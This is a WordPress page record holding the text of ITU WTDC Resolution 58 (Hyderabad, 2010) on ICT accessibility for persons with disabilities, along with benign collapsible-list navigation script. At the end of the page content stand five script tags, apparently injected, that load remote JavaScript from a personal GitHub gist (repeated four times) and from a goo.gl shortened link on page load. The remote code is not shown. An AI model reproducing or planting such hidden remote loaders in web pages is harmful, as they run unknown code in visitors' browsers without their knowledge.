{"id":617,"date":"2013-05-29T01:26:04","date_gmt":"2013-05-29T05:26:04","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=617"},"modified":"2015-06-30T00:10:01","modified_gmt":"2015-06-30T04:10:01","slug":"wtdc_58","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtdc\/wtdc-2010\/wtdc_58\/","title":{"rendered":"WTDC Resolution 58"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTDC RESOLUTION 58 (Hyderabad, 2010)<\/span><\/h3>\n<h4><span style=\"\">Access to information and communication technology for persons with disabilities, including persons with age-related disabilities<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Development Conference (Hyderabad, 2010),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the ITU Telecommunication Development Sector (ITU-D) special initiative on persons with disabilities, and studies under ITU-D Question 20\/1 on access to telecommunication services for persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the Telecommunication Development Bureau, in partnership with G3ict (Global Initiative for Inclusive Information Communication Technologies)1, has elaborated an eAccessibility toolkit for policy-makers, which is freely available and accessible online, in order to (i) facilitate development of best policies and strategies for implementation of the Convention on the Rights of Persons with Disabilities; (ii) provide a platform for sharing best practices on information and communication technology (ICT) disability issues; and (iii) set forth action steps for an effective policy framework;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 70 (Johannesburg, 2008) of the World Telecommunication Standardization Assembly relating to telecommunication\/ICT accessibility for persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the following actions in the ITU Telecommunication Standardization Sector (ITU-T): (i) studies under Question 4\/2 on human factors-related issues for improvement of the quality of life through international telecommunications and Question 26\/16 on accessibility to multimedia systems and services, including the recent Recommendation ITU-T F.790 on telecommunication accessibility guidelines for older persons and persons with disabilities; (ii) publication by the Telecommunication Standardization Advisory Group of the guide for ITU study groups entitled &#8220;Considering end-user needs in developing Recommendations&#8221;; and (iii) creation of the Joint Coordination Activity on accessibility and human factors for the purposes of awareness-raising, advice, assistance, collaboration, coordination and networking;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        ongoing work in the ITU Radiocommunication Sector to bridge the digital disability divide;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        the formation by the Internet Governance Forum of the Dynamic Coalition on Accessibility and Disability, in which ITU-D participates,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the World Health Organization estimates that ten per cent of the world&#8217;s population has some type of disability, and that there are different types of disabilities (e.g. physical, mental and sensorial disabilities), each requiring special considerations when designing ICT public policy;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that one of the main challenges for the design and implementation of public policy for ICT accessibility is the non-availability of statistics that reflect access or use of ICT by persons with disabilities, many countries having only generic statistics on their population with disability without distinguishing between each type of disability or multiple disabilities (e.g. blind and deaf persons);<\/span><\/li>\n<li class=\"col\" style=\"\"><span style=\"\">c)        that the United Nations Convention on the Rights of Persons with Disabilities, which came into force on 3 May 2008, requires States Parties to take appropriate measures:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">1)        ensure ICT and emergency service access to persons with disabilities on an equal basis (Article 9, \u00a7 1(b));<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2)        promote ICT access for persons with disabilities to new ICT services, including Internet (Article 9, \u00a7 2);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3)        promote the design, production and distribution of accessible ICT at an early stage (Article 9, \u00a7 2(h));<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4)        ensure that persons with disabilities can exercise the right to freedom of expression and opinion (Article 21);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5)        provide information in accessible formats and technologies appropriate to different kinds of disabilities in a timely manner and without additional cost (Article 21, \u00a7 (a));<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6)        urge private entities that render services to the public to provide information and services in accessible and usable formats for persons with disabilities (Article 21, \u00a7 (c));<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7)        encourage mass media (including information providers through Internet) to make their services accessible to persons with disabilities (Article 21, \u00a7 (d));<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that the United Nations Convention on the Rights of Persons with Disabilities further states that there is discrimination on the basis of disability if there is denial of reasonable accommodation, considering &#8220;reasonable accommodation&#8221; to mean necessary and appropriate modification or adjustments not imposing a disproportionate or undue burden, to ensure to persons with disabilities the enjoyment or exercise of all human rights and fundamental freedoms (i.e. freedom of speech, access to information) (Article 2);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that States Parties to the Convention on the Rights of Persons with Disabilities undertake to collect adequate information for formulating and implementing policies to give effect to the Convention, and that this information must be disaggregated, and should help identify and address barriers faced by persons with disabilities in exercising their rights (Article 31);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        that maximizing access to ICT services, products and terminals for persons with disabilities will support autonomy of persons with disabilities, by enabling e-learning, enhancing their suitability for ICT jobs, allowing them to benefit from e-health, and such like;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        that United Nations General Assembly Resolution 61\/106 adopting the Convention on the Rights of Persons with Disabilities requests the Secretary-General (in \u00a7 5) &#8220;&#8230; to implement progressively standards and guidelines for the accessibility of facilities and services of the United Nations system, taking into account relevant provisions of the Convention, in particular when undertaking renovations&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        that persons with disabilities, both acting as individuals and through relevant organizations, should be involved in and participate in the process of elaborating legal\/regulatory provisions, public policy and standards, pursuant to the rationale of &#8220;Nothing about us without us&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the World Summit on the Information Society acknowledged that special attention should be given to the needs of older persons and persons with disabilities: (i) when elaborating national cyberstrategies, including educational, administrative and legislative measures; (ii) for using ICT in education and human resources development; (iii) in order that equipment and services offer easy and affordable access, under the principles of universal design and assistive technology; (iv) to promote telework and to increase employment opportunities for persons with disabilities; (v) for creation of content that is pertinent to persons with disabilities; and (vii) to create the required abilities for the use of ICT by persons with disabilities2;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        the Cairo Declaration (November, 2007) and the Lusaka Declaration (July, 2008) on supporting access to ICT services for persons with disabilities, as well as the Phuket Declaration on tsunami preparedness for persons with disabilities (March, 2007) and the Hyderabad Declaration of the Internet Governance Forum on accessibility for persons with disabilities (December 2008),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">taking into account<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the principles that should govern ICT services, equipment and software in order to be accessible, namely: universal design, equal access, functional equivalence, accessibility, and affordability;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that ICT accessibility for persons with disabilities should be achieved through cooperation between governments, the private sector, non-governmental organizations and civil society;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        the importance of coordination and exchange of information by and between United Nations bodies concerned;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the prevailing difference in ICT accessibility for persons with disabilities in the regions, in countries, and within each country,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves to invite Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to ratify the Convention on the Rights of Persons with Disabilities, and to take the relevant measures to effectively make ICT services, equipment and software accessible to persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to develop national laws, regulations, policies, guidelines or other mechanisms for ICT accessibility for persons with disabilities in accordance with the principles of equal access, functional equivalence, affordability and universal design, taking full advantage of available tools, guidelines and standards;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to collect disaggregated data on ICT accessibility for persons with disabilities aimed at creating e-accessibility statistics and &#8211; in the near future &#8211; relevant indicators that will contribute to the policy-making process;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to consider introducing ICT-accessible services for persons with disabilities, such as telecommunication\/relay services (hearing and speech disabilities), accessible websites, public phones with accessibility features (e.g. volume control, information in Braille), public schools, institutions and community centres with a range of accessible equipment including screen readers, Braille printers, hearing aids, among others;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to encourage and enable active participation by persons with disabilities, both as individuals and as organizations, in the policy-making process for ICTs and related areas where ICTs have an impact, by ensuring that the consultation process, meetings and\/or surveys are accessible to participation by persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to promote and undertake research and development of ICT-accessible equipment, services and software, with emphasis on free and open-source software and affordable equipment and services;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        to envisage establishing a programme that considers ICT-accessibility priorities, to be periodically reviewed in order to ensure its relevance to the specific local conditions of a country\/region, with a view to progressive implementation;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8        to mainstream ICT accessibility for persons with disabilities, which involves taking into consideration accessibility principles in a cross-cutting manner;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">9        to consider exemption from taxes and customs duties on ICT devices and assistive equipment for persons with disabilities, in accordance with the national regulations on this matter;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">10        to establish ongoing and permanent collaboration between developed and developing countries in order to exchange information, technology and best practices related to ICT accessibility for persons with disabilities,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Sector Members<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to adopt a self-regulation approach for rendering ICT equipment and services accessible for persons with disabilities, it being expressly understood that self-regulation does not override legal and regulatory provisions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to adopt a universal design principle from an early stage when designing, producing and creating ICT equipment, services and software, so as to avoid costly retrofitting measures;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to promote, if applicable, research and development on ICT-accessible equipment, services and software, having due regard to affordability for persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to take due account of the needs of persons with disabilities, encouraging their active participation so as to receive first-hand information on their requirements for ICT accessibility;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to collaborate with Member States in order to render ICTs accessible for persons with disabilities,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Development Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to ensure that each ITU-D programme, project or activity takes into account ICT-accessibility issues and is adapted to the needs of all persons with disabilities, including persons with age-related disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to develop and\/or update tools and guidelines for use\/reference by Member States in mainstreaming ICT-accessibility issues in their national\/regional policies and regulations, and provide the necessary capacity building;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to identify and document examples of best practice for accessibility in the field of telecommunications\/ICT for dissemination, sharing of experiences and provision of information among ITU Member States and Sector Members;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to consider holding seminars, symposia or forums for policy-makers, telecommunication regulators and Sector Members at which ICT-accessibility policies are presented and discussed, and also to promote the elaboration of books, reports or literature that address ICT accessibility for persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to collaborate with the Radiocommunication Bureau and the Telecommunication Standardization Bureau on accessibility-related activities, particularly in creating awareness and mainstreaming telecommunication\/ICT accessibility policies, as well as creating programmes that enable countries to introduce services which allow persons with disabilities to utilize ICT services effectively, reporting the findings to the Council, as appropriate, in both cases;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to collaborate and cooperate with relevant United Nations entities and disability organizations in all regions in order to generate awareness of the need for the design and implementation of policies or self-regulatory approaches that will make ICTs accessible for persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        to ensure that the needs of the communities of persons with disabilities are taken into account in the provision of ICT equipment, services and software;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8        to consider the development of an internship programme for persons with disabilities who have expertise in the field of ICTs, so as to build capacity among persons with disabilities in the public policy-making process;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">9        to designate a focal point for ICT accessibility for persons with disabilities, and to strengthen the special initiative on persons with disabilities,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">further instructs the Director of the Telecommunication Development Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to review, in consultation with the SecretaryGeneral, the accessibility of ITU services and facilities, including meetings and events, to consider taking actions, where appropriate, pursuant to United Nations General Assembly Resolution 61\/106, and to inform Member States and Sector Members about the implementation of such actions, as appropriate.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTDC RESOLUTION 58 (Hyderabad, 2010) Access to information and communication technology for persons with disabilities, including persons with age-related disabilities The World Telecommunication Development Conference (Hyderabad, 2010), recognizing a) the ITU Telecommunication Development Sector (ITU-D) special initiative on persons with disabilities, and studies under ITU-D Question 20\/1 on access to telecommunication services for persons with 